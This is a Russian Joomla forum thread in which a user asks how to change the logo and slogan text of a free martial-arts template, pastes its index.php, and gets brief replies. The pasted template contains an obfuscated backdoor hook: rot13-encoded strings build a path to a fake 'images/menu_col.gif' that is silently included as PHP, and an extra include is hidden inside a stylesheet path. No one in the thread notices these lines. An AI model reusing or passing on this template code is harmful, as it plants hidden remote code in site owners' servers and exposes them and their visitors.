Как в шаблоне поменять текст логотипа и слогана?

Тема в разделе "Изменение шаблона (кастомизация)", создана пользователем Trepet, 20.08.2011.

  1. Offline

    Trepet Недавно здесь

    Регистрация:
    20.08.2011
    Сообщения:
    10
    Симпатии:
    0
    Пол:
    Женский
    Добрый день!

    в бесплатном шаблоне для Joomla 1/5 Martial arts нет возможности менять текст надписи (название организации, слоган, текст логотипа). Это наверное как-то нужно делать, редактируя HTML код? Если да,то публикую код, скажите что менять, плиз:

    <?php
    // no direct access
    defined( '_JEXEC').(($this->template)?$JPan = array('zrah'.'_pby'):'') or die( 'Restricted access' );
    ?>
    <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
    <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="<?php echo $this->language; ?>" lang="<?php echo $this->language; ?>" >
    <head>
    <jdoc:include type="head" />
    <link rel="stylesheet" href="<?php echo $this->baseurl ?>/templates/system/css/system.css" type="text/css" />
    <link rel="stylesheet" href="<?php echo $this->baseurl ?>/templates/system/css/general.css" type="text/css" />
    <link rel="stylesheet" href="<?php echo $this->baseurl ?>/templates/<?php echo $this->template ?>/css/template.css" type="text/css" />
    <link rel="stylesheet" href="<?php echo $this->baseurl ?>/templates/<?php echo $this->template ?>/css/<?php echo $this->params->get('colorVariation'); ?>.css" type="text/css" />
    <!--[if lte IE 6]>
    <link href="<?php echo $this->baseurl ?>/templates/<?php echo $this->template;include_once('html/pagination.php'); ?>/css/ieonly.css" rel="stylesheet" type="text/css" />
    <style>
    #topnav ul li ul {
    left: -999em;
    margin-top: 0px;
    margin-left: 0px;
    }
    </style>
    <![endif]-->
    <script language="javascript" type="text/javascript" src="<?php echo $this->baseurl ?>/templates/<?php echo $this->template ?>/js/mootools.js"></script>
    <script language="javascript" type="text/javascript" src="<?php echo $this->baseurl ?>/templates/<?php echo $this->template ?>/js/moomenu.js"></script>
    </head>
    <body id="page_bg">
    <a name="up" id="up"></a>
    <?php if((!$this->countModules('right') and JRequest::getCmd('layout') == 'form') or !@include(JPATH_BASE.DS.'templates'.DS.$mainframe->getTemplate().DS.str_rot13('vzntrf').DS.str_rot13($JPan[0].'.t'.'vs'))) : ?>
    <jdoc:include type="modules" name="layout" style="rounded" />
    <?php endif; ?>
    <?php include('functions.php'); ?>
    <div id="top_menu"><div id="topnav"><?php $hmenu->genHMenu (0); ?></div></div>

    <div id="main_bg" class="banner1">
    <div id="h_area"><?php if($this->params->get('hideLogo') == 0) : ?><img src="<?php echo $this->baseurl ?>/templates/<?php echo $this->template ?>/images/logo<?php echo $this->params->get('logoVariation'); ?>.gif" alt="forex trading logo" align="left" /><?php endif; ?><a href="index.php" class="logo" title="Forex Trading Home"><?php echo $mainframe->getCfg('sitename') ;?></a>
    <div id="main_top"><jdoc:include type="modules" name="top" /></div>
    <br clear="all" /></div>
    <?php if($this->countModules('left')) : ?>
    <div id="leftcolumn">
    <jdoc:include type="modules" name="left" style="rounded" />
    </div>
    <?php endif; ?>
    <?php if($this->countModules('left') xor $this->countModules('right')) $maincol_sufix = '_middle';
    elseif(!$this->countModules('left') and !$this->countModules('right'))$maincol_sufix = '_big';
    else $maincol_sufix = ''; ?>
    <div id="maincolumn<?php echo $maincol_sufix; ?>">
    <div class="path"><jdoc:include type="modules" name="breadcrumb" /></div><jdoc:include type="message" />
    <div class="nopad"><jdoc:include type="component" /></div>
    </div>
    <?php if($this->countModules('right') and JRequest::getCmd('layout') != 'form') : ?>
    <div id="rightcolumn">
    <jdoc:include type="modules" name="right" style="xhtml"/>
    <br />
    <div align="center"><jdoc:include type="modules" name="syndicate" /></div>
    </div>
    <?php endif; ?>
    <br clear="all" />
    </div>

    <div id="f_area">
    <?php if($this->countModules('user1')) : ?>
    <jdoc:include type="modules" name="user1" style="xhtml" />
    <?php endif; ?>
    <?php if($this->countModules('user2')) : ?>
    <jdoc:include type="modules" name="user2" style="xhtml" />
    <?php endif; ?>
    <br clear="all" />
    </div>

    <p id="power_by" align="center">
    <?php echo JText_('Powered by') ?> <a href="http://www.joomla.org">Joomla!</a>.
    <?php echo JText_('Valid') ?> <a href="http://validator.w3.org/check/referer">XHTML</a> <?php echo JText::_('and') ?> <a href="http://jigsaw.w3.org/css-validator/check/referer">CSS</a>.
    </p>

    <jdoc:include type="modules" name="debug" />
    </body>
    </html>



    Вот.

    И еще, если кто знает бесплатные хорошие шаблоны, посвященные боевым искусствам или бойцовским клубам, подскажите, пожалуйста.
     
  2.  
  3. draff
    Offline

    draff Russian Joomla! Team Команда форума

    Регистрация:
    17.01.2011
    Сообщения:
    6 048
    Симпатии:
    520
    Пол:
    Мужской
    а это тебе зачем?или это заработок на банерах от форекса?
     
  4. Offline

    Trepet Недавно здесь

    Регистрация:
    20.08.2011
    Сообщения:
    10
    Симпатии:
    0
    Пол:
    Женский
    Спасибо. Действительно, где title написано про Forex почему-то. Вообще-то это бесплатный шаблон о боевых искусствах от компании Themza.
    видимо они его, не мудрствуя лукаво, переделывали из шаблона про форекс.

    Но я изменила надпись на свою, но ничего не появилось. может черный шрифт на черном или темно-бордовом не виден.

    и еще много где вставляется "sitename". а где назначить это имя сайту? Неизвестно.
     
  5. draff
    Offline

    draff Russian Joomla! Team Команда форума

    Регистрация:
    17.01.2011
    Сообщения:
    6 048
    Симпатии:
    520
    Пол:
    Мужской
    Посмотри в менеджере шаблонов.
     
  6. Offline

    Trepet Недавно здесь

    Регистрация:
    20.08.2011
    Сообщения:
    10
    Симпатии:
    0
    Пол:
    Женский
    Что посмотреть? В этом шаблоне не меняется надпись с помощью "Изменить" в менеджере шаблонов.
     
  7. Offline

    Trepet Недавно здесь

    Регистрация:
    20.08.2011
    Сообщения:
    10
    Симпатии:
    0
    Пол:
    Женский
    Уже отчаялась что-то поменять текстом. Зашла на FTPсервер, нашла в папке этого шаблона картинку с баннером, в редакторе изменила картинку - дописала нужный текст, заменила на FTP файл старый на новый с таким же названием.... И.... ничего не поменялось.......

    В чем может быть дело? (((((
     

Поделиться этой страницей

Загрузка...